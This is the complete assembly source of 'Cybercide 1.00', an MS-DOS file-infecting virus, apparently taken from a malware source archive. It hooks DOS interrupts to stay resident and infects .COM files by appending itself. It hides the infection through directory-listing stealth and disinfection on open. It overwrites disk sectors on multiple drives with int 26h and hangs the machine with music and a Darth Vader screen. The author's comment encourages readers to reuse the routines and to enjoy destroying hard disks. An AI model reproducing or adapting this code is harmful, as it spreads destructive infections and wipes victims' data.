MalwareSourceCode/MSDOS/C-Index/Virus.MSDOS.Unknown.cybrcide.asm

999 lines
32 KiB
NASM
Raw Normal View History

2021-01-12 23:38:47 +00:00
.model tiny
.code
org 100h
;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=;
; A NEW ORDER OF INTELLIGENCE PRESENTS: ;
; ;
; Cybercide 1.00 - The original source-code ;
; Copyright (c) -91 by Cruel Entity / Macaroni Ted ;
; ;
; This one is really old now. Mcaffe virus scanner have detected it for ;
; years. Therefor I've decided to realease it. I hope you'll learn some- ;
; thing from it. You are free to use routines from it and also rebuild ;
; it. Just give me some credits. ;
; ;
; I hope you'll feel the nice feeling you get when you hear that many ;
; hard-disks have been destroyed by you virus. So keep up the good work ;
; and write more virus. ;
; ;
; Of cource I can't take any responsibility for all virus-coders who ;
; use any of the routines in this virus. ;
; ;
; Greetings to; God for creating AT&T's ;
; ;
; ps! Tasm /m3 and tlink /t to get this babe into executable! ;
;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=;
start:
call $+3
sub_this: pop bp
mov ax,0dd22h ;are we already in memory?
int 21h
cmp ax,03d33h
jne $+7
lea dx,[bp+(cancel-sub_this)]
jmp far ptr dx
mov ax,3521h ;get int 21h vect
int 21h
mov [bp+(int_21h_off-sub_this)],bx
mov [bp+(int_21h_seg-sub_this)],es
mov ax,3509h ;get int 9h vect
int 21h
mov [bp+(int_9h_off-sub_this)],bx
mov [bp+(int_9h_seg-sub_this)],es
mov ax,351ch ;get int 1ch vect
int 21h
mov [bp+(int_1ch_off-sub_this)],bx
mov [bp+(int_1ch_seg-sub_this)],es
mov ax,cs
dec ax
mov es,ax
mov ax,es:[0003h]
sub ax,[bp+(memlen-sub_this)]
mov es:[0003h],ax
mov ax,[bp+(memlen-sub_this)]
sub word ptr es:[0012h],ax
mov es,es:[0012h]
push es
lea si,[bp+(start-sub_this)]
mov di,0100h
mov cx,[bp+(filelen-sub_this)]
rep movsb
pop ds ;es => ds
mov ax,2521h ;new vector at ES:0100
lea dx,new_int_21h
int 21h
mov ax,2509h ;int 9h
lea dx,new_int_9h
int 21h
mov ax,251ch ;int 1ch
lea dx,new_int_1ch
int 21h
cancel:
push cs ;cs => ds => es
push cs
pop ds
pop es
lea si,[bp+(first_bytes-sub_this)]
mov cx,3
mov di,100h
rep movsb
sub di,3
jmp far ptr di
ULTIMATHULE DB 'nam nesut agn<67>m dem <20>nk mo <20>nk ,marf'
db 'kcig xeR sluloraC ruh nes egn<67>l r<>f ,n<> in snniM'
; ^^^^^^^^^ Only a swedish poem written backwards ^^^^^^^^^
;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Resident part -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
imperial_march dw 330,600
dw 330,600
dw 330,600
dw 262,450
dw 392,150
dw 330,600
dw 262,450
dw 392,150
dw 330,1200
dw 494,600
dw 494,600
dw 494,600
dw 523,450
dw 392,150
dw 330,600
dw 262,450
dw 392,150
dw 330,1200
dw 0
db 'YTITNE na ot LEURC eb reven'
darth_return:
push cs
push cs
pop ds
pop es
lea si,imperial_march
darth_again:
lodsw
cmp ax,0
je darth_end
mov di,ax
play:
mov al,0b6h
out 43h,al
mov dx,12h
mov ax,3280h
div di
out 42h,al
mov al,ah
out 42h,al
in al,61h
mov ah,al
or al,3
out 61h,al
delay:
lodsw
mov cx,ax
m_delay:
push cx
mov cx,2700
loop $
pop cx
loop m_delay
out 61h,al
jmp darth_again
darth_end:
xor al,al ;sound off
out 61h,al
mov ax,0b800h ;print ansi
mov es,ax
lea si,darth_pic
mov di,3680
mov cx,320
rep movsb
jmp $ ;hang
db 'ynollef ELIV a si GINKLAWYAJ'
next_hour:
cmp dh,0
je check_100th
pop dx
pop cx
pop ax
jmp exit
check_100th:
cmp dl,5
jb random_sector
pop dx
pop cx
pop ax
jmp exit
random_sector:
pushf
push bx
call get_rnd
mov cx,10 ;/ 10
xor dx,dx
div cx
mov dx,ax ;dx=ax
mov al,2h ;drive #, start with c:
mov cx,1h ;# of sectors to overwrite
lea bx,logo ;address to overwriting data
loopie:
int 26h
popf
inc al
cmp al,25
jne loopie
pop bx
popf
pop dx
pop cx
pop ax
jmp exit
db '... I SHALL FEAR NO EVIL ...'
check_time_int1c:
mov ah,2ch ;get time
int 21h
cmp ch,16 ;>16:??
jae set_flag_flag
pop dx
pop cx
pop ax
jmp exit
set_flag_flag:
mov cs:flagga,1
pop dx
pop cx
pop ax
jmp exit
logo db '>>> A.N.O.I <<<' ; DATA to overwrite with
;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; New Interrupt 21h Handler
;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
new_int_21h:
pushf
cmp ax,0dd22h ;mem check
je mem_check
cmp ah,2ch ;time?
je exit
cmp ah,2ah ;date?
je exit
cmp ah,9
je exit
cmp ah,11h
je find_old
cmp ah,12h
je find_old
cmp ah,4eh ;dos 2.x
je find_
cmp ah,4fh
je find_
cmp ah,3dh ;open file
je open_file
push ax
push cx
push dx
mov ah,2ch
int 21h
cmp ch,00 ;24:??
jne $+7
lea dx,darth_return
jmp far ptr dx
cmp cl,00 ;a new hour?
jne $+7
lea ax,next_hour
jmp far ptr ax
mov ah,2ah ;get date
int 21h
cmp al,6 ;flag time? (SAT)
je check_time_int1c ;check time
pop dx
pop cx
pop ax
exit:
popf
real_int_21h: db 0eah ;jmp...
int_21h_off dw ? ;to old int 21h
int_21h_seg dw ?
call_int21h:
jmp dword ptr cs:int_21h_off ;force a call to DOS
ret
open_file:
push bp
lea bp,open
jmp far ptr bp
find_:
push bp
lea bp,find_new
jmp far ptr bp
mem_check:
popf
mov ax,3d33h
iret
;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Stealth FCB
;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
find_old:
popf
pushf ;find fcb
push cs
call call_int21h
cmp al,0ffh
je no_more_files
pushf
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
push bp
mov ah,2fh ;get dta
int 21h
push es ;es:bx
pop ds ;ds:bx
mov si,bx ;ds:si
add si,16 ;ext name
lodsw
cmp ax,'OC' ;.CO
jne cancel_ff
lodsb
cmp al,'M' ;M
jne cancel_ff
ext_ok:
;ext=com
mov si,bx ;check size
add si,26h
lodsw
cmp ax,0 ;=> 0ffffh?
jne cancel_ff
mov si,bx ;check if already infected
add si,30
lodsw ;time
and al,00011111b
cmp al,12
je $+7 ;already infected (sec=24)
lea dx,infect
jmp far ptr dx
mov si,bx ;alter size
add si,36
mov di,si
lodsw
sub ax,cs:filelen
jz cancel_ff
stosw
cancel_ff:
pop bp
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
no_more_files: retf 2 ;iret flags
cancel_inf:
pop ax
pop ax
jmp cancel_ff
;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Stealth 4Eh
;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
find_new:
pop bp
popf
pushf ;find 4e
push cs
call call_int21h
jnc more_files
retf 2
more_files:
pushf
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
push bp
mov ah,2fh ;get dta
int 21h
push es ;es:bx
pop ds ;ds:bx
mov si,bx ;ds:si
add si,16h
push si ;ONLY for infection
push es
mov si,bx
push cs ;cs => es
pop es
add si,1eh ;f name
lea di,filename
mov cx,25
get_fname:
lodsb
cmp al,0
je get_f_klar
stosb
loop get_fname
get_f_klar:
mov al,0 ;asciiz
stosb
push ds ;ds=> es
pop es
push cs ;cs=> ds
pop ds
mov si,di
sub si,4 ;'COM'
lodsw ;CO
cmp ax,'OC'
je check_m
cmp ax,'oc'
jne cancel_new
check_m:
lodsb
cmp al,'m'
je ext_is_com
cmp al,'M'
jne cancel_new
ext_is_com:
push es ;es=> ds
pop ds
mov si,bx
add si,1ch ;check size
lodsw
cmp ax,0 ;=> 0ffffh
jne cancel_new
mov si,bx
add si,16h
lodsw ;time
and al,00011111b
cmp al,12
jne attrib_check ;already infected (sec=24)
mov si,bx
add si,1ah
mov di,si
lodsw ;alter size
sub ax,cs:filelen
jz cancel_new
stosw
cancel_new:
pop ax ;crap...
pop ax
pop bp
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
no_more_files2: retf 2 ;iret flags
;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Infect
;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
infect:
add bx,30
push bx
sub bx,30
push es
mov si,bx ;fname
add si,8
push cs ;cs=>es
pop es
lea di,filename
mov cx,8
cpy_name:
lodsb
cmp al,20h
je name_klar
stosb
loop cpy_name
name_klar:
mov al,'.'
stosb
mov si,bx
add si,16
mov cx,3
rep movsb
mov al,0
stosb
attrib_check:
push cs ;cs=> ds => es
push cs
pop ds
pop es
mov ax,4300h ;get attrib
lea dx,filename
int 21h
mov attribute,cx ;save it
xor cx,cx
mov ax,4301h ;force all attribs
int 21h
mov ax,3d02h ;open file
pushf
push cs
call call_int21h
jnc $+7 ;not a valid filename
lea dx,cancel_inf
jmp far ptr dx
mov bx,ax ;handle
mov ah,3fh ;3 first bytes
lea dx,first_bytes
mov cx,3
int 21h
mov ax,4202h ;go eof and get size
xor dx,dx
xor cx,cx
int 21h
sub ax,3
mov jmp_2,ax
mov ah,40h ;write virus to eof
mov cx,filelen ;virlen
mov dx,100h
int 21h
mov ax,4200h ;goto beg
xor cx,cx
xor dx,dx
int 21h
mov ah,40h ;write a jmp
mov cx,3
lea dx,jmp_1
int 21h
pop ds ;=> DTA
pop si
lodsw
and al,11100000b ;secs=24
or al,00001100b
mov cx,ax
lodsw ;date
mov dx,ax
mov ax,5701h ;set time/date
int 21h
mov ah,3eh
pushf
push cs
call call_int21h ;close file
mov ax,4301h ;set attrib
push cs ;cs =>ds
pop ds
mov cx,attribute
lea dx,filename
int 21h
jmp cancel_ff
cancel_uninf2:
mov ah,3eh
pushf
push cs
call call_int21h ;close file
cancel_uninf:
pop bp
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
pushf
push cs
call call_int21h
retf 2 ;iret flags
konstig_text db '**CYBERCIDE** -- FLOATING THROUGH THE VOID'
;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
; Open
;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
open:
pop bp
popf
pushf
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
push bp
push ds ;ds=> es
pop es
mov bx,dx ;save dx = bx
mov bp,ax ;save ax = bp
mov di,dx
mov cx,025h ;MAX
mov dx,cx
mov al,0
repnz scasb
sub di,4
mov si,di
lodsw
cmp ax,'OC'
je check_m2
cmp ax,'oc'
jne cancel_uninf
check_m2:
lodsb
cmp al,'m'
je ext_is_com2
cmp al,'M'
jne cancel_uninf
ext_is_com2:
mov dx,bx ;restore
mov ax,bp ;restore
pushf
push cs
call call_int21h ;open file
jc cancel_uninf
mov bx,ax ;handle
mov ax,5700h ;get time/date
int 21h
and cl,00011111b
cmp cl,12
je $+7
lea bp,cancel_uninf2
jmp far ptr bp
mov ax,9000h ;temp area
mov ds,ax ;ds
mov es,ax ;es
mov ah,3fh ;read whole file
mov cx,0ffffh
mov dx,0
int 21h
mov si,0
add si,ax ;add size
sub si,3 ;3 last bytes
mov di,0 ;copy 3 last bytes to
mov cx,3 ;beg
rep movsb
push ax
mov ax,4200h ;goto beg
mov cx,0
mov dx,0
int 21h
pop cx
sub cx,cs:filelen
mov ah,40h ;write new file
mov dx,0
int 21h
mov ah,40h ;set eof mark
mov cx,0
int 21h
mov ah,3eh
pushf
push cs
call call_int21h ;close file
pop bp
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
pushf
push cs
call call_int21h ;force open
retf 2
;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
; New Interrupt 9h Handler
;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
;-9h
new_int_9h:
pushf
push ax
push bx
push ds
xor ax,ax ;ds=> 0
mov ds,ax
mov al,byte ptr ds:[0417h] ;bios, shift status
and al,8
cmp al,8 ;is alt active?
jne check_anoi ;not pressed
in al,60h
cmp al,53h ;del?
jne $+7
lea ax,alt_del
jmp far ptr ax
check_anoi:
in al,60h ;read key
cmp cs:anoi_flag,0
je check_a
cmp cs:anoi_flag,1
je check_n
cmp cs:anoi_flag,2
je check_o
cmp cs:anoi_flag,3
je check_i
cmp cs:anoi_flag,4
je anoi_
exit_zero:
mov cs:anoi_flag,0
mov cs:e_3rd,0
exit_9h:
pop ds
pop bx
pop ax
popf
real_int_9h: db 0eah ;jmp...
int_9h_off dw ? ;to old int 9h
int_9h_seg dw ?
anoi_flag db 0
e_3rd db 0
anoi_text db ' iS AROUND!',0
exit_anoi:
inc cs:e_3rd
cmp cs:e_3rd,10
je exit_zero
jmp exit_9h
check_a:
cmp al,1eh ;'a'
jne exit_anoi
mov cs:anoi_flag,1
jmp exit_9h
check_n:
cmp al,31h ;'n'
jne exit_anoi
mov cs:anoi_flag,2
jmp exit_9h
check_o:
cmp al,18h ;'o'
jne exit_anoi
mov cs:anoi_flag,3
jmp exit_9h
check_i:
cmp al,17h ;'i'
jne exit_anoi
mov cs:anoi_flag,4
jmp exit_9h
anoi_:
push bp
mov ah,0eh ;print chr
mov bx,0
xor bp,bp
print_next:
mov al,cs:[anoi_text+bp]
int 10h
inc bp
cmp al,0
jne print_next
pop bp
jmp exit_zero
alt_del:
mov ax,0b800h
mov es,ax
mov di,0
mov al,'A'
stosb
mov di,158
mov al,'N'
stosb
mov di,3998
mov al,'I'
stosb
mov di,3840
mov al,'O'
stosb
jmp exit_9h
darth_pic:
DB '<27>',30,'<27>',30,'<27>',30,'<27>',30,'<27>',30,'<27>',30,' ',7,' ',7
DB ' ',7,' ',15,' ',15,'I',15,' ',15,'h',15,'e',15,'r',15
DB 'e',15,'b',15,'y',15,' ',15,'p',15,'r',15,'o',15,'c',15
DB 'l',15,'a',15,'i',15,'m',15,' ',15,'t',15,'h',15,'i',15
DB 's',15,' ',15,'c',15,'o',15,'m',15,'p',15,'u',15,'t',15
DB 'e',15,'r',15,' ',15,'a',15,'s',15,' ',15,'t',15,'h',15
DB 'e',15,' ',15,'p',15,'r',15,'o',15,'p',15,'e',15,'r',15
DB 't',15,'y',15,' ',15,'o',15,'f',15,' ',15,'A',15,'.',15
DB 'N',15,'.',15,'O',15,'.',15,'I',15,' ',15,' ',15,' ',7
DB ' ',7,' ',14,'<27>',30,'<27>',30,'<27>',30,'<27>',30,'<27>',30,'<27>',30
DB ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
DB ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
DB ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
DB ' ',15,' ',15,' ',15,'!',15,'!',15,' ',15,'A',15,'L',15
DB 'L',15,' ',15,'H',15,'A',15,'I',15,'L',15,' ',15,'D',15
DB 'A',15,'R',15,'T',15,'H',15,' ',15,'V',15,'A',15,'D',15
DB 'E',15,'R',15,' ',15,'!',15,'!',15,' ',15,' ',15,' ',15
DB ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
DB ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
DB ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
; New Interrupt 1Ch Handler
;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
new_int_1ch:
pushf
cmp cs:flagga,0
jne print_flag
exit_1c:
popf
real_int_1ch: db 0eah ;jmp...
int_1ch_off dw ? ;to old int 1ch
int_1ch_seg dw ?
flagga db 0 ;no flag
print_flag:
push ax
push bx
push cx
push di
push si
push ds
push es
push bp
cld
mov ax,0b800h
mov es,ax
mov ds,ax
mov di,1
mov si,1
lea bp,tabl
xor ch,ch
mov cl,cs:[bp]
inc bp
again:
mov bl,cs:[bp]
inc bp
line:
lodsb
and al,00000111b
or al,bl
stosb
inc di
inc si
loop line
mov cl,cs:[bp]
inc bp
cmp cl,0
jne again
pop bp
pop es
pop ds
pop si
pop di
pop cx
pop bx
pop ax
jmp exit_1c
; # B G B
tabl db 35,16, 10,96, 35,16, 35,16, 10,96, 35,16, 35,16, 10,96, 35,16
db 35,16, 10,96, 35,16, 35,16, 10,96, 35,16, 35,16, 10,96, 35,16
db 35,16, 10,96, 35,16, 35,16, 10,96, 35,16, 35,16, 10,96, 35,16
db 80,96,80,96,80,96,80,96
db 35,16, 10,96, 35,16, 35,16, 10,96, 35,16, 35,16, 10,96, 35,16
db 35,16, 10,96, 35,16, 35,16, 10,96, 35,16, 35,16, 10,96, 35,16
db 35,16, 10,96, 35,16, 35,16, 10,96, 35,16, 35,16, 10,96, 35,16
db 35,16, 10,96, 35,16, 35,16, 10,96, 35,16, 35,16, 10,96, 35,16,0
DB '-=CYBERCIDE=- 01-30-1993 * COPYRIGHT (C) 1992-93 A.N.O.I DEVELOPMENT'
get_rnd:
push dx
push cx
push bx
in al,40h ;'@'
add ax,0000
mov dx,0000
mov cx,0007
rnd_init5:
shl ax,1
rcl dx,1
mov bl,al
xor bl,dh
jns rnd_init6
inc al
rnd_init6:
loop rnd_init5
pop bx
mov al,dl
pop cx
pop dx
rnd_init_ret:
ret
filelen dw offset eof - offset start
memlen dw 300
filename db 25 dup(?)
attribute dw ?
jmp_1 db 0e9h
jmp_2 dw ?
first_bytes db 90h,0cdh,20h
eof:
end start